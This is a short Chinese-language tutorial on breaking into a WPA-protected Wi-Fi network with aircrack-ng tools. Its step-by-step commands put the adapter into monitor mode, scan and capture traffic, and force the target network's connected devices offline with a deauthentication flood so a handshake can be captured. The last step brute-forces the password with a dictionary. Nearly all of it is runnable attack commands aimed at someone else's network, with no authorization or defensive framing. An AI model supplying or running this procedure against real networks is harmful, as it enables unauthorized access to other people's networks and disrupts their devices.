1、开启网卡监听模式

airmon-ng start wlan0

(关闭网卡监听模式)

airmon-ng stop wlan0

2、查看网卡是否成功开启监听模式

ifconfig		//wlan0后有mon即为开启成功,此时网卡处于监听模式

3、扫描wifi

airodump-ng wlan0mon		//扫描结束后ctrl+c结束进程

4、抓包

BSSID为wifi的MAC地址

PWR为信号强弱程度,数值越小信号越强

DATA为数据量,越大使用的人就越多

CH为信道频率(频道)

ESSID为wifi的名称

airodump-ng --bssid BSSID -c CH -w 抓包存储的路径 wlan0mon

//BSSID为wifi的MAC地址
//CH为信道频率
//路径后要加文件名

5、迫使对方连接的设备下线重连

在扫描wifi的同时新建一个终端:

aireplay-ng -0 0 STATION -a BSSID wlan0mon

//STATION为连接wifi的设备MAC地址
//BSSID为wifi的MAC地址

当扫描wifi的界面出现WPA handshake时表示抓包成功,这时停止扫描和发送数据

6、爆破解码

将密码字典和抓到的包放到同一目录便于操作,主要使用抓到的握手包(cap包)解码

aircrack-ng -w 密码字典路径 握手包路径

顺利的话即可爆破出密码。